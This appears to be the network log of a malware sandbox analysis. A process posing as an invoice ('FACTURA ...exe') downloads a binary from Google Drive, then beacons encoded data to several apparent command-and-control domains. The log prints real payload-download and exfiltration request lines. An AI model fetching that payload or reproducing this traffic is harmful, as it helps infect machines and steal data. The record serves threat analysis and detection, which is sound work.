                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=94213&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=808&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID  Source IP      Source Port  Destination IP  Destination Port
83          192.168.11.20  49875        172.67.148.133  80
Timestamp                             Bytes transferred  Direction  Data
Oct 23, 2024 18:58:44.906498909 CEST  828                OUT        POST /u1q9/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.1-mine.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.1-mine.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.1-mine.online/u1q9/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 2rul-=uffgsGMqdZU8s3OMtbfDJpwVc7PaV3ZQCitJAgIS80yH85hjiZF8mXIDkokDrOgbxU3E/C1cD4TfeMn8O//EEg+cZb/lY91L8pvyUH+ZrIqu/wDNav7NvA77Jf94o4154DvTr1F+NjYEgZ7ysTtT+PPmI9wWbcBLyI0+voJNBmbQ38RhSPuaykuM/9iaOMovYlOS4Hav1USPk1Q21KzAwdY=
Oct 23, 2024 18:58:45.272495985 CEST  1289               IN         HTTP/1.1 520
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:58:45 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Content-Length: 7195
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yfOaJoGBuwEnpqn26%2BmQcjYSg3GdiYqohhoycACntZWCZcoq9S6TelMeU%2BICedlACaiVT06g3sry3cUk%2FlR5il%2BYdUJgCUHqeyoi1%2Bbk4IindFB73prWWa95I0b5AYZlgGF%2FnQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8d73460efa54c34a-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=94642&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=828&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID  Source IP      Source Port  Destination IP  Destination Port
84          192.168.11.20  49876        172.67.148.133  80
Timestamp                             Bytes transferred  Direction  Data
Oct 23, 2024 18:58:47.531887054 CEST  5156               OUT        POST /u1q9/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.1-mine.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.1-mine.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.1-mine.online/u1q9/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 18:58:47.875664949 CEST | 1289 | IN | HTTP/1.1 520
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:58:47 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Content-Length: 7195
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LyCZFQbd6IN5e27jKo%2F%2FjiIOK1lpND3mkOfYouV08WYfXTGLe1wve2U6VK9knWCG6smb1XI95guQv%2FG5yw76icdhyaRF4m070V1F2jh7DemN3wrulUxbg0d48EgCb17bZed8KA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8d73461f6e21428e-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=94819&sent=7&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7977&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port
85 | 192.168.11.20 | 49877 | 172.67.148.133 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:58:50.153589010 CEST | 535 | OUT | GET /u1q9/?Hh=g6BlO&2rul-=jd3Av2k5V8Eau16mgcfaPd8VebuAL1FcJ0MaInc68HOQ7ZBrvq4ejSFdl4VVlO0+8Eq38X9/B8LMXqH/bNKlbEK/GZjnRsE0t8/pdXuVmtOQpH7wXf7Q+zg= HTTP/1.1
                                                                                                                                                                                                                        Host: www.1-mine.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 18:58:50.495031118 CEST | 942 | IN | HTTP/1.1 520
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:58:50 GMT
                                                                                                                                                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                        Content-Length: 15
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VMm5q3dJhT2U3oaW6VvN7acuw9SMF%2F0Cb3Wf28brySrsMaYjhe%2BjGGq%2B8kgMpU%2BbGubVIY0ShrKF%2BUqiMFcmTf%2BhaUlUplfiH5j7AjtnRKPA0V4iL2aqs7nSInkoWh6BQN4Y7A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8d73462fc8de7c81-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=95552&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=535&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                        Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 30
                                                                                                                                                                                                                        Data Ascii: error code: 520


Session ID | Source IP | Source Port | Destination IP | Destination Port
86 | 192.168.11.20 | 49878 | 3.33.130.190 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:58:55.612921953 CEST | 817 | OUT | POST /e0v8/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.binacamasala.com
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.binacamasala.com
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.binacamasala.com/e0v8/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 4d 54 6a 71 77 65 45 44 4d 50 56 33 77 68 57 52 4d 4b 66 7a 48 6e 61 2f 63 42 7a 63 53 69 73 34 6e 2f 44 4b 6c 31 48 33 44 6d 58 6b 30 7a 72 61 71 6f 76 4c 6f 6d 4f 70 6a 4b 75 59 7a 78 4a 45 6a 7a 59 42 41 63 54 41 64 30 50 67 49 58 39 66 63 78 75 32 31 4c 4f 6f 78 35 4f 54 47 4f 6a 54 30 39 4e 54 4b 34 58 4e 67 71 39 71 68 67 6e 6f 6e 75 52 6e 6a 77 61 52 6f 49 4d 74 4a 39 53 79 2f 61 39 4b 2b 50 31 79 69 73 79 75 65 2b 4e 55 65 7a 66 70 32 49 79 45 46 79 70 4b 77 4e 32 66 65 64 59 70 5a 47 38 68 37 6b 7a 66 5a 46 30 6b 57 72 68 5a 6b 44 43 59 57 7a 67 34 6a 52 4c 67 33 41 3d 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=MTjqweEDMPV3whWRMKfzHna/cBzcSis4n/DKl1H3DmXk0zraqovLomOpjKuYzxJEjzYBAcTAd0PgIX9fcxu21LOox5OTGOjT09NTK4XNgq9qhgnonuRnjwaRoIMtJ9Sy/a9K+P1yisyue+NUezfp2IyEFypKwN2fedYpZG8h7kzfZF0kWrhZkDCYWzg4jRLg3A==


Session ID | Source IP | Source Port | Destination IP | Destination Port
87 | 192.168.11.20 | 49879 | 3.33.130.190 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:58:58.253422976 CEST | 837 | OUT | POST /e0v8/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.binacamasala.com
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.binacamasala.com
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.binacamasala.com/e0v8/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 4d 54 6a 71 77 65 45 44 4d 50 56 33 32 42 6d 52 4e 72 66 7a 50 6e 61 38 51 68 7a 63 45 53 73 43 6e 2f 48 4b 6c 30 43 73 43 51 6e 6b 30 54 62 61 72 71 58 4c 74 6d 4f 70 36 36 75 64 75 42 4a 66 6a 7a 55 7a 41 63 76 41 64 30 62 67 49 53 5a 66 63 67 75 70 36 37 4f 71 71 70 4f 56 4a 75 6a 54 30 39 4e 54 4b 37 72 72 67 71 46 71 67 51 33 6f 6e 4c 6c 6d 2f 67 61 53 2b 59 4d 74 66 39 53 32 2f 61 39 34 2b 4f 5a 49 69 75 36 75 65 2f 39 55 66 6e 4c 75 76 34 79 43 64 53 6f 5a 6a 4e 43 61 56 75 30 6f 65 55 77 34 39 55 2f 52 52 7a 35 2b 4c 5a 56 39 6e 51 65 71 53 44 5a 51 68 54 4b 37 71 48 57 78 48 6e 35 59 43 50 73 39 54 38 4a 73 35 44 78 32 53 64 30 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=MTjqweEDMPV32BmRNrfzPna8QhzcESsCn/HKl0CsCQnk0TbarqXLtmOp66uduBJfjzUzAcvAd0bgISZfcgup67OqqpOVJujT09NTK7rrgqFqgQ3onLlm/gaS+YMtf9S2/a94+OZIiu6ue/9UfnLuv4yCdSoZjNCaVu0oeUw49U/RRz5+LZV9nQeqSDZQhTK7qHWxHn5YCPs9T8Js5Dx2Sd0=


Session ID | Source IP | Source Port | Destination IP | Destination Port
88 | 192.168.11.20 | 49880 | 3.33.130.190 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:59:00.894787073 CEST | 2578 | OUT | POST /e0v8/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.binacamasala.com
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.binacamasala.com
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.binacamasala.com/e0v8/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 18:59:00.894844055 CEST | 5408 | OUT


Session ID | Source IP | Source Port | Destination IP | Destination Port
89 | 192.168.11.20 | 49881 | 3.33.130.190 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:59:03.530150890 CEST | 538 | OUT | GET /e0v8/?2rul-=BRLKzowcHpFkwiCaHOnpSWjmXz6pRQQbl5LLjDqiFhfX4i3Xo6uolyXZn4m1rAB7uwEzOtHNU3mZLRFYJya+3dmXpK/KMeaogPo3NqnUjbhI+XHqg4485wo=&Hh=g6BlO HTTP/1.1
                                                                                                                                                                                                                        Host: www.binacamasala.com
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 18:59:06.545911074 CEST | 390 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: openresty
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:59:06 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 250
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?2rul-=BRLKzowcHpFkwiCaHOnpSWjmXz6pRQQbl5LLjDqiFhfX4i3Xo6uolyXZn4m1rAB7uwEzOtHNU3mZLRFYJya+3dmXpK/KMeaogPo3NqnUjbhI+XHqg4485wo=&Hh=g6BlO"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
90 | 192.168.11.20 | 49882 | 3.33.130.190 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:59:11.678843975 CEST | 802 | OUT | POST /n7zc/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.wrl-llc.net
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.wrl-llc.net
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.wrl-llc.net/n7zc/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)


Session ID | Source IP | Source Port | Destination IP | Destination Port
91 | 192.168.11.20 | 49883 | 3.33.130.190 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:59:14.314918041 CEST | 822 | OUT | POST /n7zc/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.wrl-llc.net
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.wrl-llc.net
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.wrl-llc.net/n7zc/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)


Session ID | Source IP | Source Port | Destination IP | Destination Port
92 | 192.168.11.20 | 49884 | 3.33.130.190 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:59:16.951644897 CEST | 1289 | OUT | POST /n7zc/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.wrl-llc.net
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.wrl-llc.net
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.wrl-llc.net/n7zc/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 18:59:16.951697111 CEST | 3867 | OUT
Oct 23, 2024 18:59:16.951744080 CEST | 2815 | OUT


Session ID | Source IP | Source Port | Destination IP | Destination Port
93 | 192.168.11.20 | 49885 | 3.33.130.190 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:59:19.595108986 CEST | 533 | OUT | GET /n7zc/?Hh=g6BlO&2rul-=4uIsvpMyaiNaEMynSWraJ/2ewRneyY2IM3xoEszCiepO+vQwtMzBLq4BvMD3ENezA07qcacnmpI/gT8KQ+99hp5F4iXZ7molM84vqZhw689aaRZynnXQiFE= HTTP/1.1
                                                                                                                                                                                                                        Host: www.wrl-llc.net
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 19:00:19.713668108 CEST | 390 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: openresty
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 17:00:19 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 250
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Hh=g6BlO&2rul-=4uIsvpMyaiNaEMynSWraJ/2ewRneyY2IM3xoEszCiepO+vQwtMzBLq4BvMD3ENezA07qcacnmpI/gT8KQ+99hp5F4iXZ7molM84vqZhw689aaRZynnXQiFE="}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49790 | 142.250.80.110 | 443 | 3320 | C:\Users\user\Desktop\FACTURA A-7507_H1758.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-23 16:52:49 UTC | 216 | OUT | GET /uc?export=download&id=18R_I2LlsbLnU2tcUkX6lpHGt7UzbGPbM HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                        Host: drive.google.com
                                                                                                                                                                                                                        Cache-Control: no-cache
2024-10-23 16:52:50 UTC | 1610 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:52:50 GMT
                                                                                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=18R_I2LlsbLnU2tcUkX6lpHGt7UzbGPbM&export=download
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                        Content-Security-Policy: script-src 'nonce-ednNNoAwjxRST_3VobxnoA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 49791 | 142.250.176.193 | 443 | 3320 | C:\Users\user\Desktop\FACTURA A-7507_H1758.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-23 16:52:50 UTC | 258 | OUT | GET /download?id=18R_I2LlsbLnU2tcUkX6lpHGt7UzbGPbM&export=download HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                                                                                        Connection: Keep-Alive
2024-10-23 16:52:52 UTC | 4887 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                        Content-Security-Policy: sandbox
                                                                                                                                                                                                                        Content-Security-Policy: default-src 'none'
                                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                        X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                        Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                        Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        Content-Disposition: attachment; filename="BzVXwSbr191.bin"
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Credentials: false
                                                                                                                                                                                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Content-Length: 288832
                                                                                                                                                                                                                        Last-Modified: Tue, 22 Oct 2024 11:04:58 GMT
                                                                                                                                                                                                                        X-GUploader-UploadID: AHmUCY2OOTAGc_RV4z-Iqi3WBBJQOl_Ufgc8EVgE9Zz_1Elf0xr5rMBdID_yALmBvNQS7sQvQQ
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:52:52 GMT
                                                                                                                                                                                                                        Expires: Wed, 23 Oct 2024 16:52:52 GMT
                                                                                                                                                                                                                        Cache-Control: private, max-age=0
                                                                                                                                                                                                                        X-Goog-Hash: crc32c=Mje4Dg==
                                                                                                                                                                                                                        Server: UploadServer
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
